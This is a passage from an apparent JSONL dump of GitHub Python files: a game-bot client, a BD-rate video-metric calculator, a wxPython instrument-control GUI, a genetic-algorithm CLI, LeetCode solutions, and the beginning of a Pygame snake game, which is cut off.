main()\n","repo_name":"oleksandrsirenko/mechanisms-of-action-moa-prediction","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"16156966855","text":"from game.client.user_client import UserClient\nfrom game.common.enums import *\n\n\nclass Client(UserClient):\n # Variables and info you want to save between turns go here\n def __init__(self):\n super().__init__()\n self.number = 100\n self.SENSOR_DECREE_MAPPINGS = {\n SensorType.fire: DecreeType.anti_fire_dogs,\n SensorType.tornado: DecreeType.paperweights,\n SensorType.blizzard: DecreeType.snow_shovels,\n SensorType.earthquake: DecreeType.rubber_boots,\n SensorType.monster: DecreeType.fishing_hook,\n SensorType.ufo: DecreeType.cheese\n }\n\n self.other_sensor_mappings = {\n DisasterType.fire: SensorType.fire,\n DisasterType.tornado: SensorType.tornado,\n DisasterType.blizzard: SensorType.blizzard,\n DisasterType.earthquake: SensorType.earthquake,\n DisasterType.monster: SensorType.monster,\n DisasterType.ufo: SensorType.ufo\n }\n\n self.lasting_disasters = [DisasterType.fire, DisasterType.blizzard, DisasterType.monster]\n\n def team_name(self):\n return \"Scummy Fungus\"\n\n def city_name(self):\n return \"Bingy Spingus\"\n\n def city_type(self):\n return CityType.invested\n\n # This is where your AI will decide what to do\n def take_turn(self, turn, actions, city, disasters):\n self.print('New Turn')\n # Set decree to highest rate\n highest = -1\n highest_sensor = city.sensors[SensorType.fire]\n for sensor in city.sensors.values():\n if sensor.sensor_results > highest:\n highest = sensor.sensor_results\n highest_sensor = sensor\n\n corresponding_decree = self.SENSOR_DECREE_MAPPINGS[highest_sensor.sensor_type]\n actions.set_decree(corresponding_decree)\n\n current_lasting_disasters = [x for x in disasters if x.type in self.lasting_disasters]\n\n total_effort_spent = 0\n things_done = list()\n while total_effort_spent < city.population:\n effort_remaining = city.population - total_effort_spent\n self.print(f'Spent: {total_effort_spent} | Remaining: {effort_remaining} | Total: {city.population}')\n\n effort_spent = 0\n act = None\n\n # Allocate effort to repairing the city structure\n if city.structure < city.max_structure and ActionType.repair_structure not in things_done:\n self.print('Fixing structure')\n difference = city.max_structure - city.structure\n effort_spent = min(4 * difference, effort_remaining)\n act = ActionType.repair_structure\n\n # Allocate effort to recovering population\n elif city.population < city.max_structure and ActionType.regain_population not in things_done:\n self.print('Recovering population')\n difference = city.max_structure - city.population\n effort_spent = min(4 * difference, effort_remaining)\n act = ActionType.regain_population\n\n # Allocate effort to disasters\n elif len(current_lasting_disasters) > 0:\n self.print('Getting rid of disaster')\n disaster = None\n threat_score = -float('INF')\n for d in current_lasting_disasters:\n ts = d.effort_remaining * (1 / (d.population_damage + d.structure_damage))\n if ts >= threat_score:\n disaster = d\n threat_score = ts\n\n if disaster is not None:\n effort_spent = min(disaster.effort_remaining, effort_remaining)\n act = disaster\n current_lasting_disasters.remove(disaster)\n\n # Allocate effort to upgrading the city\n elif city.level != CityLevel.level_three and ActionType.upgrade_city not in things_done:\n self.print('Upgrading city')\n effort_spent = min(city.effort_remaining, effort_remaining)\n act = ActionType.upgrade_city\n\n # Build police building\n elif city.gold > effort_remaining and \\\n city.buildings[BuildingType.police_station].level != BuildingLevel.level_one and \\\n city.buildings[BuildingType.police_station] not in things_done:\n self.print('Building police building')\n effort_spent = min(city.buildings[BuildingType.police_station].effort_remaining, effort_remaining)\n act = city.buildings[BuildingType.police_station]\n\n # Build billboard building\n elif city.gold > effort_remaining and \\\n city.buildings[BuildingType.billboard].level != BuildingLevel.level_one and \\\n city.buildings[BuildingType.billboard] not in things_done:\n self.print('Building billboard building')\n effort_spent = min(city.buildings[BuildingType.billboard].effort_remaining, effort_remaining)\n act = city.buildings[BuildingType.billboard]\n\n # Upgrade ufo sensor\n elif city.sensors[SensorType.ufo].level != SensorLevel.level_two and \\\n city.sensors[SensorType.ufo] not in things_done:\n self.print('Building ufo sensor')\n effort_spent = min(city.sensors[SensorType.ufo].effort_remaining, effort_remaining)\n act = city.sensors[SensorType.ufo]\n\n # Upgrade earthquake sensor\n elif city.sensors[SensorType.earthquake].level != SensorLevel.level_two and \\\n city.sensors[SensorType.earthquake] not in things_done:\n self.print('Building earthquake sensor')\n effort_spent = min(city.sensors[SensorType.earthquake].effort_remaining, effort_remaining)\n act = city.sensors[SensorType.earthquake]\n\n # Upgrade tornado sensor\n elif city.sensors[SensorType.tornado].level != SensorLevel.level_two and \\\n city.sensors[SensorType.tornado] not in things_done:\n self.print('Building tornado sensor')\n effort_spent = min(city.sensors[SensorType.tornado].effort_remaining, effort_remaining)\n act = city.sensors[SensorType.tornado]\n\n # Build printer building\n elif city.gold > effort_remaining and \\\n city.buildings[BuildingType.printer].level != BuildingLevel.level_one and \\\n city.buildings[BuildingType.printer] not in things_done:\n self.print('Building printer building')\n effort_spent = min(city.buildings[BuildingType.printer].effort_remaining, effort_remaining)\n act = city.buildings[BuildingType.printer]\n\n # Get money otherwise\n else:\n self.print('Getting money')\n effort_spent = effort_remaining\n act = ActionType.accumulate_wealth\n\n actions.add_effort(act, effort_spent)\n things_done.append(act)\n total_effort_spent += effort_spent\n","repo_name":"PixPanz/byte_le_royale_2020","sub_path":"test_clients/big_sensor_client.py","file_name":"big_sensor_client.py","file_ext":"py","file_size_in_byte":7181,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"43"} +{"seq_id":"14274851901","text":"__author__ = \"maggie.sun@intel.com, ryan.lei@intel.com\"\n\nimport numpy as np\nimport math\nimport scipy.interpolate\nimport logging\nfrom Config import LoggerName\nfrom operator import itemgetter\nfrom Utils import plot_rd_curve\n\nsubloggername = \"CalcBDRate\"\nloggername = LoggerName + '.' + '%s' % subloggername\nlogger = logging.getLogger(loggername)\n\ndef non_decreasing(L):\n return all(x<=y for x, y in zip(L, L[1:]))\n\ndef check_monotonicity(RDPoints):\n '''\n check if the input list of RD points are monotonic, assuming the input\n has been sorted in the quality value non-decreasing order. expect the bit\n rate should also be in the non-decreasing order\n '''\n br = [RDPoints[i][0] for i in range(len(RDPoints))]\n qty = [RDPoints[i][1] for i in range(len(RDPoints))]\n return non_decreasing(br) and non_decreasing(qty)\n\ndef filter_vmaf_non_monotonic(br_qty_pairs):\n '''\n To solve the problem with VMAF non-monotonicity in a flat (saturated)\n region of the curve, if VMAF non-monotonicity happens at VMAF value\n 99.5 or above, the non-monotonic value and the values corresponding\n to bitrates higher than the non-monotonic value are excluded from the\n BD-rate calculation. The VMAF BD-rate number is still reported and\n used in the VMAF metric average.\n '''\n #first sort input RD pairs by bit rate\n out_br_qty_pairs = []\n br_qty_pairs.sort(key = itemgetter(0, 1))\n for i in range(len(br_qty_pairs)):\n if (i != 0 and\n br_qty_pairs[i][0] >= out_br_qty_pairs[-1][0] and\n br_qty_pairs[i][1] < out_br_qty_pairs[-1][1] and\n out_br_qty_pairs[-1][1] >= 99.5):\n break\n else:\n out_br_qty_pairs.append(br_qty_pairs[i])\n return out_br_qty_pairs\n\n# BJONTEGAARD Bjontegaard metric\n# Calculation is adapted from Google implementation\n# PCHIP method - Piecewise Cubic Hermite Interpolating Polynomial interpolation\ndef BD_RATE(qty_type, br1, qtyMtrc1, br2, qtyMtrc2):\n brqtypairs1 = []; brqtypairs2 = []\n for i in range(min(len(qtyMtrc1), len(br1))):\n if (br1[i] != '' and qtyMtrc1[i] != ''):\n brqtypairs1.append((br1[i], qtyMtrc1[i]))\n for i in range(min(len(qtyMtrc2), len(br2))):\n if (br2[i] != '' and qtyMtrc2[i] != ''):\n brqtypairs2.append((br2[i], qtyMtrc2[i]))\n\n if (qty_type == 'VMAF_Y' or qty_type == 'VMAF_Y-NEG'):\n brqtypairs1 = filter_vmaf_non_monotonic(brqtypairs1)\n brqtypairs2 = filter_vmaf_non_monotonic(brqtypairs2)\n\n # sort the pair based on quality metric values in increasing order\n # if quality metric values are the same, then sort the bit rate in increasing order\n brqtypairs1.sort(key = itemgetter(1, 0))\n brqtypairs2.sort(key = itemgetter(1, 0))\n\n rd1_monotonic = check_monotonicity(brqtypairs1)\n rd2_monotonic = check_monotonicity(brqtypairs2)\n if (rd1_monotonic == False or rd2_monotonic == False):\n return \"Non-monotonic Error\"\n\n logbr1 = [math.log(x[0]) for x in brqtypairs1]\n qmetrics1 = [100.0 if x[1] == float('inf') else x[1] for x in brqtypairs1]\n logbr2 = [math.log(x[0]) for x in brqtypairs2]\n qmetrics2 = [100.0 if x[1] == float('inf') else x[1] for x in brqtypairs2]\n\n if not brqtypairs1 or not brqtypairs2:\n logger.info(\"one of input lists is empty!\")\n return 0.0\n\n # remove duplicated quality metric value, the RD point with higher bit rate is removed\n dup_idx = [i for i in range(1, len(qmetrics1)) if qmetrics1[i - 1] == qmetrics1[i]]\n for idx in sorted(dup_idx, reverse=True):\n del qmetrics1[idx]\n del logbr1[idx]\n dup_idx = [i for i in range(1, len(qmetrics2)) if qmetrics2[i - 1] == qmetrics2[i]]\n for idx in sorted(dup_idx, reverse=True):\n del qmetrics2[idx]\n del logbr2[idx]\n\n # find max and min of quality metrics\n min_int = max(min(qmetrics1), min(qmetrics2))\n max_int = min(max(qmetrics1), max(qmetrics2))\n if min_int >= max_int:\n logger.info(\"no overlap from input 2 lists of quality metrics!\")\n return 0.0\n\n # generate samples between max and min of quality metrics\n lin = np.linspace(min_int, max_int, num=100, retstep=True)\n interval = lin[1]\n samples = lin[0]\n\n # interpolation\n v1 = scipy.interpolate.pchip_interpolate(qmetrics1, logbr1, samples)\n v2 = scipy.interpolate.pchip_interpolate(qmetrics2, logbr2, samples)\n\n # Calculate the integral using the trapezoid method on the samples.\n int1 = np.trapz(v1, dx=interval)\n int2 = np.trapz(v2, dx=interval)\n\n # find avg diff\n avg_exp_diff = (int2 - int1) / (max_int - min_int)\n avg_diff = (math.exp(avg_exp_diff) - 1) * 100\n\n return avg_diff\n\n'''\nif __name__ == \"__main__\":\n br1 = [9563.04, 6923.28, 4894.8, 3304.32, 2108.4, 1299.84]\n #qty1 = [50.0198, 46.9709, 43.4791, 39.6659, 35.8063, 32.3055]\n #qty1 = [50.0198, 46.9709, 43.4791, 48.0000, 35.8063, 32.3055]\n qty1 = [99.8198, 99.7709, 98.4791, 99.5000, 98.8063, 98.3055]\n br2 = [9758.88, 7111.68, 5073.36, 3446.4, 2178, 1306.56]\n #qty2 = [49.6767, 46.7027, 43.2038, 39.297, 35.2944, 31.5938]\n qty2 = [99.8767, 99.7027, 99.2038, 99.200, 98.2944, 97.5938]\n qty_type = 'VMAF-Y'\n\n plot_rd_curve(br1, qty1, qty_type, 'r', '-', 'o')\n plot_rd_curve(br2, qty2, qty_type, 'b', '-', '*')\n plt.show()\n\n bdrate = BD_RATE('VMAF_Y', br1, qty1, br2, qty2)\n if bdrate != 'Non-monotonic Error':\n print(\"bdrate calculated is %3.3f%%\" % bdrate)\n else:\n print(\"there is Non-monotonic Error in bdrate calculation\")\n'''\n","repo_name":"xiph/awcy","sub_path":"convexhull_framework/src/CalcBDRate.py","file_name":"CalcBDRate.py","file_ext":"py","file_size_in_byte":5555,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"43"} +{"seq_id":"14284334156","text":"import nimodinst\nimport nidcpower\nimport wx\n\n\nclass MyFrame(wx.Frame):\n def __init__(self, *args, **kwds):\n # begin wxGlade: MyFrame.__init__\n kwds[\"style\"] = kwds.get(\"style\", 0) | wx.DEFAULT_FRAME_STYLE\n wx.Frame.__init__(self, *args, **kwds)\n self.SetSize((274, 456))\n self.device_value = wx.ComboBox(self, wx.ID_ANY, choices=[], style=wx.CB_DROPDOWN) # noqa: E501\n # self.channel_value = wx.SpinCtrlDouble(self, wx.ID_ANY, \"0\", min=0.0, max=100.0) # noqa: E501\n self.channel_value = wx.ComboBox(self, wx.ID_ANY, choices=[], style=wx.CB_DROPDOWN) # noqa: E501\n self.output_function_value = wx.ComboBox(self, wx.ID_ANY, choices=[\"DC Voltage\", \"DC Current\"], style=wx.CB_DROPDOWN) # noqa: E501\n self.voltage_value = wx.SpinCtrlDouble(self, wx.ID_ANY, \"\", min=0.0, max=100.0) # noqa: E501\n self.current_value = wx.SpinCtrlDouble(self, wx.ID_ANY, \"\", min=0.0, max=100.0) # noqa: E501\n self.voltage_range_value = wx.SpinCtrlDouble(self, wx.ID_ANY, \"\", min=0.0, max=100.0) # noqa: E501\n self.current_range_value = wx.SpinCtrlDouble(self, wx.ID_ANY, \"\", min=0.0, max=100.0) # noqa: E501\n self.output_enabled_value = wx.ToggleButton(self, wx.ID_ANY, \"\")\n self.voltage_result_value = wx.TextCtrl(self, wx.ID_ANY, \"N/A\")\n self.current_result_value = wx.TextCtrl(self, wx.ID_ANY, \"N/A\")\n self.status = wx.StaticText(self, wx.ID_ANY, \"Good!\")\n self.current_label = wx.StaticText(self, wx.ID_ANY, \"Current Limit\")\n self.voltage_label = wx.StaticText(self, wx.ID_ANY, \"Voltage Level\")\n\n self.__set_properties()\n self.__do_layout()\n # end wxGlade\n\n self.Bind(wx.EVT_CLOSE, self.__window_close_event)\n\n # Changing channel, function or device closes and creates new session\n self.Bind(wx.EVT_COMBOBOX, self.__change_device_event, self.device_value) # noqa: E501\n self.Bind(wx.EVT_COMBOBOX, self.__change_session_event, self.output_function_value) # noqa: E501\n self.Bind(wx.EVT_COMBOBOX, self.__change_session_event, self.channel_value) # noqa: E501\n\n # Changing properties updates reading\n self.Bind(wx.EVT_SPINCTRLDOUBLE, self.__change_attribute_event, self.voltage_value) # noqa: E501\n self.Bind(wx.EVT_SPINCTRLDOUBLE, self.__change_attribute_event, self.current_value) # noqa: E501\n self.Bind(wx.EVT_SPINCTRLDOUBLE, self.__change_attribute_event, self.voltage_range_value) # noqa: E501\n self.Bind(wx.EVT_SPINCTRLDOUBLE, self.__change_attribute_event, self.current_range_value) # noqa: E501\n self.Bind(wx.EVT_TOGGLEBUTTON, self.__change_attribute_event, self.output_enabled_value) # noqa: E501\n\n self._new_device = True\n self._error = False\n self._session = None\n self._modinst_session = None\n self._dev_name = None\n\n # Using NI-ModInst session to list available NI-DCPower devices\n self._modinst_session = nimodinst.Session('nidcpower')\n for dev in self._modinst_session.devices:\n dev_name = dev.device_name\n self.device_value.Append('{0}'.format(dev_name))\n self.device_value.SetSelection(0)\n\n # Opening a new session to the selected device\n self.__initialize_new_session()\n\n # Having a timer to regularly take a reading\n self._timer = wx.Timer(self, wx.ID_ANY)\n self.Bind(wx.EVT_TIMER, self.__take_measurement_event, self._timer)\n self._timer.Start(250)\n\n def __set_properties(self):\n # begin wxGlade: MyFrame.__set_properties\n self.SetTitle(\"NI-DCPower Simple SFP\")\n self.device_value.SetMinSize((141, 23))\n self.channel_value.SetMinSize((141, 23))\n self.output_function_value.SetMinSize((141, 23))\n self.output_function_value.SetSelection(0)\n self.output_enabled_value.SetMinSize((141, 26))\n self.voltage_result_value.SetMinSize((141, 23))\n self.current_result_value.SetMinSize((141, 23))\n # end wxGlade\n\n def __do_layout(self):\n # begin wxGlade: MyFrame.__do_layout\n entire_frame_sizer = wx.BoxSizer(wx.VERTICAL)\n status_sizer = wx.StaticBoxSizer(wx.StaticBox(self, wx.ID_ANY, \"Status\"), wx.HORIZONTAL) # noqa: E501\n current_result_sizer = wx.BoxSizer(wx.HORIZONTAL)\n voltage_result_sizer = wx.BoxSizer(wx.HORIZONTAL)\n output_enabled_sizer = wx.BoxSizer(wx.HORIZONTAL)\n current_range_sizer = wx.BoxSizer(wx.HORIZONTAL)\n voltage_range_sizer = wx.BoxSizer(wx.HORIZONTAL)\n current_sizer = wx.BoxSizer(wx.HORIZONTAL)\n voltage_sizer = wx.BoxSizer(wx.HORIZONTAL)\n output_function_sizer = wx.BoxSizer(wx.HORIZONTAL)\n channel_sizer = wx.BoxSizer(wx.HORIZONTAL)\n device_sizer = wx.BoxSizer(wx.HORIZONTAL)\n device_sizer.Add(self.device_value, 0, 0, 0)\n device_label = wx.StaticText(self, wx.ID_ANY, \"Device Name\")\n device_sizer.Add(device_label, 0, 0, 0)\n entire_frame_sizer.Add(device_sizer, 1, wx.EXPAND, 0)\n channel_sizer.Add(self.channel_value, 0, 0, 0)\n channel_label = wx.StaticText(self, wx.ID_ANY, \"Channel\")\n channel_sizer.Add(channel_label, 0, 0, 0)\n entire_frame_sizer.Add(channel_sizer, 1, wx.EXPAND, 0)\n output_function_sizer.Add(self.output_function_value, 0, 0, 0)\n output_function_label = wx.StaticText(self, wx.ID_ANY, \"Output Function\") # noqa: E501\n output_function_sizer.Add(output_function_label, 0, 0, 0)\n entire_frame_sizer.Add(output_function_sizer, 1, wx.EXPAND, 0)\n voltage_sizer.Add(self.voltage_value, 0, 0, 0)\n voltage_sizer.Add(self.voltage_label, 0, 0, 0)\n entire_frame_sizer.Add(voltage_sizer, 1, wx.EXPAND, 0)\n current_sizer.Add(self.current_value, 0, 0, 0)\n current_sizer.Add(self.current_label, 0, 0, 0)\n entire_frame_sizer.Add(current_sizer, 1, wx.EXPAND, 0)\n voltage_range_sizer.Add(self.voltage_range_value, 0, 0, 0)\n voltage_range_label = wx.StaticText(self, wx.ID_ANY, \"Voltage Range\")\n voltage_range_sizer.Add(voltage_range_label, 0, 0, 0)\n entire_frame_sizer.Add(voltage_range_sizer, 1, wx.EXPAND, 0)\n current_range_sizer.Add(self.current_range_value, 0, 0, 0)\n current_range_label = wx.StaticText(self, wx.ID_ANY, \"Current Range\")\n current_range_sizer.Add(current_range_label, 0, 0, 0)\n entire_frame_sizer.Add(current_range_sizer, 1, wx.EXPAND, 0)\n output_enabled_sizer.Add(self.output_enabled_value, 0, 0, 0)\n output_enabled_label = wx.StaticText(self, wx.ID_ANY, \"Output Enabled\")\n output_enabled_sizer.Add(output_enabled_label, 0, 0, 0)\n entire_frame_sizer.Add(output_enabled_sizer, 1, wx.EXPAND, 0)\n static_line_1 = wx.StaticLine(self, wx.ID_ANY)\n entire_frame_sizer.Add(static_line_1, 0, wx.EXPAND, 0)\n voltage_result_sizer.Add(self.voltage_result_value, 0, 0, 0)\n voltage_result_label = wx.StaticText(self, wx.ID_ANY, \"V\")\n voltage_result_sizer.Add(voltage_result_label, 0, 0, 0)\n entire_frame_sizer.Add(voltage_result_sizer, 1, wx.EXPAND, 0)\n current_result_sizer.Add(self.current_result_value, 0, 0, 0)\n current_result_label = wx.StaticText(self, wx.ID_ANY, \"A\")\n current_result_sizer.Add(current_result_label, 0, 0, 0)\n entire_frame_sizer.Add(current_result_sizer, 1, wx.EXPAND, 0)\n status_sizer.Add(self.status, 0, 0, 0)\n entire_frame_sizer.Add(status_sizer, 25, wx.EXPAND, 0)\n self.SetSizer(entire_frame_sizer)\n self.Layout()\n # end wxGlade\n\n def __initialize_new_session(self):\n # If opening for the first time set output function and channel\n if self._new_device is True:\n # Open simulated session\n self._session = nidcpower.Session(self.device_value.GetStringSelection(), \"\", False, \"Simulate = 1\") # noqa: E501\n channels = self._session.channel_count\n self._session.close()\n self._session = None\n\n # Add total channels on device to combo-box\n self.channel_value.Clear()\n for channel in range(channels):\n self.channel_value.Append(str(channel))\n\n # Set selection to first item in the list\n self.channel_value.SetSelection(0)\n self.output_function_value.SetSelection(0)\n self._new_device = False\n\n # Open session to device and set controls to default values\n try:\n if self._session is not None:\n self._session.close()\n self._session = nidcpower.Session(self.device_value.GetStringSelection(), self.channel_value.GetStringSelection()) # noqa: E501\n self._session.source_mode = nidcpower.SourceMode.SINGLE_POINT\n if self.output_function_value.GetStringSelection() == \"DC Current\":\n self._session.output_function = nidcpower.OutputFunction.DC_CURRENT # noqa: E501\n self.current_label.SetLabel(\"Current Level\")\n self.voltage_label.SetLabel(\"Voltage Limit\")\n self.voltage_value.SetValue(self._session.voltage_limit)\n self.current_value.SetValue(self._session.current_level)\n self.voltage_range_value.SetValue(self._session.voltage_limit_range) # noqa: E501\n self.current_range_value.SetValue(self._session.current_level_range) # noqa: E501\n else:\n self._session.output_function = nidcpower.OutputFunction.DC_VOLTAGE # noqa: E501\n self.current_label.SetLabel(\"Current Limit\")\n self.voltage_label.SetLabel(\"Voltage Level\")\n self.voltage_value.SetValue(self._session.voltage_level)\n self.current_value.SetValue(self._session.current_limit)\n self.voltage_range_value.SetValue(self._session.voltage_level_range) # noqa: E501\n self.current_range_value.SetValue(self._session.current_limit_range) # noqa: E501\n self.output_enabled_value.SetValue(False)\n self._session.output_enabled = False\n self._session.source_delay = 0.1\n self._session._initiate()\n self._error = False\n self.status.SetLabel(\"Good!\")\n\n # Catch error\n except nidcpower.Error as e:\n self._session = None\n self._error = True\n self.status.SetLabel(str(e))\n self.status.Wrap(225)\n\n def __change_session_event(self, event):\n self.__initialize_new_session()\n\n def __change_device_event(self, event):\n self._new_device = True\n self.__initialize_new_session()\n\n def __change_attribute_event(self, event):\n try:\n if self.output_function_value.GetStringSelection() == \"DC Current\":\n self._session.voltage_limit = self.voltage_value.GetValue()\n self._session.current_level = self.current_value.GetValue() # noqa: E501\n self._session.voltage_limit_range = self.voltage_range_value.GetValue() # noqa: E501\n self._session.current_level_range = self.current_range_value.GetValue() # noqa: E501\n else:\n self._session.voltage_level = self.voltage_value.GetValue()\n self._session.current_limit = self.current_value.GetValue() # noqa: E501\n self._session.voltage_limit_range = self.voltage_range_value.GetValue() # noqa: E501\n self._session.current_level_range = self.current_range_value.GetValue() # noqa: E501\n self._session.output_enabled = self.output_enabled_value.GetValue() # noqa: E501\n self.status.SetLabel(\"Good!\")\n self._error = False\n\n except nidcpower.Error as e:\n self._error = True\n self.status.SetLabel(str(e))\n self.status.Wrap(225)\n\n def __window_close_event(self, event):\n if self._session is not None:\n self._session.close()\n self.Destroy()\n\n def __take_measurement_event(self, event):\n if self._error is False:\n if self._session is not None:\n try:\n measurements = self._session.measure_multiple()\n self.voltage_result_value.SetLabel(str(measurements[0].voltage)) # noqa: E501\n self.current_result_value.SetLabel(str(measurements[0].current)) # noqa: E501\n\n except nidcpower.Error as e:\n self._error = True\n self.status.SetLabel(str(e))\n self.status.Wrap(225)\n# end of class MyFrame\n\n\nclass MyApp(wx.App):\n def OnInit(self):\n self.frame = MyFrame(None, wx.ID_ANY, \"\")\n self.SetTopWindow(self.frame)\n self.frame.Show()\n return True\n# end of class MyApp\n\n\nif __name__ == \"__main__\":\n app = MyApp(0)\n app.MainLoop()\n","repo_name":"texasaggie97-zz/nimi-sfp","sub_path":"nidcpower_sfp.py","file_name":"nidcpower_sfp.py","file_ext":"py","file_size_in_byte":12947,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"10949056955","text":"scores = input().split()\n# put your python code here\nwrong = 0\ncorrect = 0\nfor score in scores:\n if score == 'C':\n correct += 1\n continue\n if score == 'I':\n wrong += 1\n if wrong == 3:\n print(\"Game over\")\n print(correct)\n break\nelse:\n print(\"You won\")\n print(correct)","repo_name":"merlin2181/Coffee-Machine","sub_path":"Problems/Game over/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"36706234667","text":"\"\"\"usage: \n-h, -help shows this help message\n-s, -simulation out_file1 out_file2 runs algorithm and stores solutions with calculated fitness function in and best solution in \n-v_s, -visualize_solution in_file visualizes single solution instance red from \n-v_c, -visualize_chart in_file visualizes fitness function charts red from \n\"\"\"\nfrom visualization import *\nfrom algorithm import *\nimport simulation\nimport random\nimport threading\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom time import sleep\nimport json\n\nmode = None\ntry:\n for index, arg in enumerate(sys.argv):\n if arg.startswith('-') and mode is not None:\n print(\"cannot use with multiple flags\")\n print(__doc__)\n sys.exit()\n elif arg.startswith('-'):\n if arg == \"-h\":\n print(__doc__)\n sys.exit()\n elif arg == \"-s\":\n mode = [\"-s\", sys.argv[index+1], sys.argv[index+2]]\n elif arg == \"-v_s\":\n mode = [\"-v_s\", sys.argv[index+1]]\n elif arg == \"-v_c\":\n mode = [\"-v_c\", sys.argv[index+1]]\nexcept:\n print(__doc__)\n sys.exit()\nif mode is None:\n print(__doc__)\n sys.exit()\n\n\nif mode[0] == \"-s\":\n algorithm = GeneticAlgorithm()\n print(\"calculating ...\")\n populations = algorithm.compute_populations()\n print(\"done calculating.\")\n try:\n with open(mode[1],'w') as file:\n x = [i for i in range(len(populations))]\n y = [sum([s.fitness_function for s in pop]) / len(pop) for pop in populations]\n for i in range(len(populations)):\n file.write(str(x[i]) + ' ' + str(y[i]) + '\\n')\n print(\"population written to \" + str(mode[1]))\n with open(mode[2],'w') as file:\n file.write(json.dumps((populations[-1][-1]).__dict__))\n print(\"best solution written to \" + str(mode[2]))\n except Exception as e:\n print(e)\n print('something went wrong with saving to file ... exiting')\n sys.exit()\nelif mode[0] == \"-v_s\":\n try:\n with open(mode[1]) as file:\n solution_as_dict = json.loads(file.read())\n solution = SolutionInstance(solution_as_dict['launch_time'], solution_as_dict['latitude'], solution_as_dict['launch_speed'])\n algorithm = GeneticAlgorithm()\n time_begin, time_end, planets ,rocket = algorithm.prepare_solution_to_visualize(solution, nr_of_frames = 8000)\n visualization = Visualization(time_begin, time_end, planets ,rocket, 4)\n visualization.show()\n except Exception as e:\n print(\"something went wrong with reading from file \" + str(mode[1]) + \" ... exiting\")\n sys.exit()\nelif mode[0] == \"-v_c\":\n try:\n x = []\n y = []\n with open(mode[1]) as file:\n for line in file:\n xx, yy = line.split(' ')\n x.append(int(xx))\n y.append(float(yy))\n print(\"done reading from file\")\n width = 0.35 # the width of the bars\n fig, ax = plt.subplots()\n ax.set_ylabel('Fitness function')\n rect = ax.bar(x, y, width, color='r')\n for r in rect:\n height = r.get_height()\n ax.text(r.get_x() + r.get_width()/2., 1.05*height,'', ha='center', va='bottom')\n plt.show()\n except:\n print(\"something went wrong with reading from file \" + str(mode[1]) + \" ... exiting\")\n sys.exit()\nelse:\n print(\"can not understand\")\n print(__doc__)\n","repo_name":"mzakrze/genetic-algorithm-solar-system","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"17524632844","text":"class MyHashMap(object):\n\n def __init__(self):\n self.keys = []\n self.values = []\n \n\n def put(self, key, value):\n \"\"\"\n :type key: int\n :type value: int\n :rtype: None\n \"\"\"\n for i in range(len(self.keys)):\n if self.keys[i] == key:\n self.values[i] = value\n return \n\n self.keys.append(key)\n self.values.append(value)\n return\n\n \n\n def get(self, key):\n \"\"\"\n :type key: int\n :rtype: int\n \"\"\"\n for i in range(len(self.keys)):\n if self.keys[i] == key:\n return self.values[i] \n\n return -1 \n\n def remove(self, key):\n \"\"\"\n :type key: int\n :rtype: None\n \"\"\"\n for i in range(len(self.keys)):\n if self.keys[i] == key:\n del self.values[i]\n del self.keys[i]\n break \n\n\n# Your MyHashMap object will be instantiated and called as such:\n# obj = MyHashMap()\n# obj.put(key,value)\n# param_2 = obj.get(key)\n# obj.remove(key)","repo_name":"louiswalsh/leet","sub_path":"0817-design-hashmap/0817-design-hashmap.py","file_name":"0817-design-hashmap.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"38444181796","text":"'''\nQUESTION:\n206. Reverse Linked List\n\nReverse a singly linked list.\n\nExample:\n\nInput: 1->2->3->4->5->NULL\nOutput: 5->4->3->2->1->NULL\nFollow up:\n\nA linked list can be reversed either iteratively or recursively. Could you implement both?\n\n'''\n\nclass Solution(object):\n def reverseList(self, head):\n curr = head\n if curr is None:\n return head\n if curr.next is None:\n return head\n p = self.reverseList(curr.next)\n curr.next.next = curr\n curr.next = None\n return p\n\n\n'''\nIdeas/thoughts:\n1.check , if the curr is null then return,\n2.if curr .next is null.that means it is last node and need to become the head and has to be the first node\n3.recursively iterate thru list\n4.set curr . next . next to curr\n5.set curr .next to null \n\n'''","repo_name":"ravichalla/wallbreaker","sub_path":"week4/reverse_linkedlist.py","file_name":"reverse_linkedlist.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"42472968049","text":"import pygame, sys, random, time\n\nfrom pygame.display import update\nfrom pygame.draw import rect\nimport color \nfrom pygame.locals import *\n\n\npygame.init()\nfps = 10\nwin_width = 800\nwin_height = 600\nworm_x = 380\nworm_y = 280 \nspeed_worm_x = 0\nspeed_worm_y = 0\nfood_x = random.randrange(0, 780, 20)\nfood_y = random.randrange(0, 580, 20)\nworm_list = []\nworm_length = 0\nGameOver = False\na = [\"r\", \"l\", \"u\", \"d\"]\nscore = 0\nfont_score = pygame.font.Font(None, 40)\nfont_GameOver = pygame.font.Font(None, 80)\nscr = 0\nbomb_x = random.randrange(0, 780, 20)\nbomb_y = random.randrange(0, 580, 20)\n\n\nwin = pygame.display.set_mode((win_width, win_height))\npygame.display.set_caption(\"Snake\")\nclock = pygame.time.Clock()\n\ndef worm_function(wrm_lst, wrm_x, wrm_y):\n g_over = False\n worm_head = [wrm_x, wrm_y]\n wrm_lst.append(worm_head)\n for lst in wrm_lst:\n pygame.draw.rect(win, color.green, (lst[0], lst[1], 20, 20))\n for each_section in wrm_lst[:-1]:\n if each_section == worm_head:\n g_over = True\n return g_over\n\nwhile not GameOver:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_RIGHT and \"l\" in a:\n speed_worm_x = 20\n speed_worm_y = 0\n a.clear()\n a.append(\"l\")\n a.append(\"u\")\n a.append(\"d\")\n if event.key == K_LEFT and \"r\" in a:\n speed_worm_x = -20\n 